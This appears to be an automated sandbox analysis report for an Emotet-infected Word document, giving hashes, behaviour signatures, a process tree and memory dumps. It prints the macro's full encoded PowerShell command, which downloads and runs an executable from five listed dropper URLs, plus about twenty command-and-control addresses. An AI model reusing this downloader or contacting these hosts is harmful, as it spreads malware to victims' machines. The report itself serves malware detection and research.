Analysis

  • max time kernel
    27s
  • max time network
    35s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    31-07-2020 16:45

General

  • Target

    ea17ccea356d9aea41d6b75461d7e04862651052270fc643c1efe9d66626140f.doc

  • Size

    170KB

  • MD5

    0ae7d86750581340bd3da288a5464be0

  • SHA1

    32d42d062516ec7b783d0938641aa0ed25c7c74b

  • SHA256

    ea17ccea356d9aea41d6b75461d7e04862651052270fc643c1efe9d66626140f

  • SHA512

    1e333d4a545984f0e03aafcca3b30c5c0b3fc740cb8c6337f2a4311fbd44d4a8eb352639749adcb0d50cc347f86c818bfec71119c6acc526350664b76df7f476

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://pufferfiz.net/btrsports/3_qr_elsv8z8sb/

exe.dropper

http://rnetwork.com.br/administrator/itn1q_s_nhf/

exe.dropper

http://essoft.com/cgi-bin/bmkhn_v_pd5gahs8/

exe.dropper

http://dairyfocus.com.au/administrator/andxl/zvsg2_ijx_nd82wyrwn/

exe.dropper

http://kobes.net/cgi-bin/18i_56g1_o9cw7yj/

Extracted

Family

emotet

C2

142.105.151.124:443

62.108.54.22:8080

212.51.142.238:8080

71.208.216.10:80

108.48.41.69:80

83.110.223.58:443

210.165.156.91:80

104.131.44.150:8080

104.236.246.93:8080

5.39.91.110:7080

209.141.54.221:8080

209.182.216.177:443

153.126.210.205:7080

91.211.88.52:7080

180.92.239.110:8080

183.101.175.193:80

162.241.92.219:8080

87.106.139.101:8080

114.146.222.200:80

65.111.120.223:80

rsa_pubkey.plain

Signatures

  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Blacklisted process makes network request 3 IoCs
  • Drops file in System32 directory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Modifies registry class 280 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ea17ccea356d9aea41d6b75461d7e04862651052270fc643c1efe9d66626140f.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1424
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABEAEsAUABVAFcAZQBrAGIAPQAnAEYATABRAEoATwBkAGEAZwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBgAEMAdQBgAFIASQBgAFQAWQBwAFIATwBUAE8AYwBvAEwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABaAFgATwBFAEkAaQBkAGEAIAA9ACAAJwAyADgAMAAnADsAJABWAFoASABSAEgAagBwAHQAPQAnAFUASABTAEsAWgB3AGIAYQAnADsAJABIAEsAUwBMAFkAZgBrAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAWABPAEUASQBpAGQAYQArACcALgBlAHgAZQAnADsAJABNAE8ATgBBAFcAYgBmAGcAPQAnAFAASQBMAEQAQgBiAGcAZgAnADsAJABaAFEAUABUAE8AZQBuAHIAPQAmACgAJwBuAGUAdwAnACsAJwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AdwBlAEIAQwBMAEkAZQBuAFQAOwAkAEcAWABNAEMAWQB0AG8AcQA9ACcAaAB0AHQAcAA6AC8ALwBwAHUAZgBmAGUAcgBmAGkAegAuAG4AZQB0AC8AYgB0AHIAcwBwAG8AcgB0AHMALwAzAF8AcQByAF8AZQBsAHMAdgA4AHoAOABzAGIALwAqAGgAdAB0AHAAOgAvAC8AcgBuAGUAdAB3AG8AcgBrAC4AYwBvAG0ALgBiAHIALwBhAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAC8AaQB0AG4AMQBxAF8AcwBfAG4AaABmAC8AKgBoAHQAdABwADoALwAvAGUAcwBzAG8AZgB0AC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AYgBtAGsAaABuAF8AdgBfAHAAZAA1AGcAYQBoAHMAOAAvACoAaAB0AHQAcAA6AC8ALwBkAGEAaQByAHkAZgBvAGMAdQBzAC4AYwBvAG0ALgBhAHUALwBhAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAC8AYQBuAGQAeABsAC8AegB2AHMAZwAyAF8AaQBqAHgAXwBuAGQAOAAyAHcAeQByAHcAbgAvACoAaAB0AHQAcAA6AC8ALwBrAG8AYgBlAHMALgBuAGUAdAAvAGMAZwBpAC0AYgBpAG4ALwAxADgAaQBfADUANgBnADEAXwBvADkAYwB3ADcAeQBqAC8AJwAuACIAcwBwAGAAbABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXAFQASQBLAEcAbABiAGcAPQAnAE4AQgBRAE0ATQBkAG4AdAAnADsAZgBvAHIAZQBhAGMAaAAoACQAWQBQAEEATwBBAGcAZgBsACAAaQBuACAAJABHAFgATQBDAFkAdABvAHEAKQB7AHQAcgB5AHsAJABaAFEAUABUAE8AZQBuAHIALgAiAGQAYABvAHcAYABOAGwAbwBBAGQAZgBJAGwAZQAiACgAJABZAFAAQQBPAEEAZwBmAGwALAAgACQASABLAFMATABZAGYAawByACkAOwAkAEsAVQBDAEYATQBiAHEAegA9ACcAWABSAEYAUQBEAHUAbQBmACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASABLAFMATABZAGYAawByACkALgAiAGwARQBuAGAAZwB0AGgAIgAgAC0AZwBlACAAMgA1ADIANgA0ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAHIAYABFAGAAQQBUAEUAIgAoACQASABLAFMATABZAGYAawByACkAOwAkAEIASABDAFkAUABmAHIAZQA9ACcARABWAEkAUABJAGkAdwBrACcAOwBiAHIAZQBhAGsAOwAkAFEASABIAFUASABhAGUAcAA9ACcAVwBYAFYAQQBIAHcAagByACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAVwBNAEEAVQB3AG4AdgA9ACcAUABDAFgASQBIAGsAZABvACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    PID:1344
  • C:\Users\Admin\280.exe
    C:\Users\Admin\280.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Drops file in System32 directory
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:316
    • C:\Windows\SysWOW64\wkscli\wscript.exe
      "C:\Windows\SysWOW64\wkscli\wscript.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1452

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/316-194-0x00000000001F0000-0x00000000001FC000-memory.dmp

    Filesize

    48KB

  • memory/1424-2-0x0000000008A40000-0x0000000008A44000-memory.dmp

    Filesize

    16KB

  • memory/1424-4-0x0000000007050000-0x0000000007250000-memory.dmp

    Filesize

    2.0MB

  • memory/1424-6-0x000000000AF30000-0x000000000AF34000-memory.dmp

    Filesize

    16KB

  • memory/1424-7-0x000000000BFB0000-0x000000000BFB4000-memory.dmp

    Filesize

    16KB

  • memory/1424-10-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-12-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-14-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-15-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-16-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-17-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-19-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-21-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-23-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-25-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-27-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-29-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-31-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-33-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-35-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-37-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-39-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-41-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-43-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-45-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-47-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-49-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-51-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-53-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-54-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-55-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-56-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-57-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-58-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-60-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-62-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-64-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-66-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-68-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-70-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-72-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-74-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-76-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-78-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-80-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-82-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-84-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-86-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-88-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-90-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-92-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-94-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-96-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-98-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-100-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-102-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-104-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-106-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-108-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-110-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-112-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-114-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-116-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-118-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-120-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-122-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-124-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-126-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-128-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-130-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-132-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-134-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-136-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-138-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-140-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-142-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-144-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-146-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-148-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-150-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-152-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-154-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-156-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-158-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-160-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-162-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-164-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-166-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-168-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-170-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-172-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-174-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-176-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-178-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-180-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-182-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-184-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-186-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-188-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1424-190-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1452-197-0x0000000000320000-0x000000000032C000-memory.dmp

    Filesize

    48KB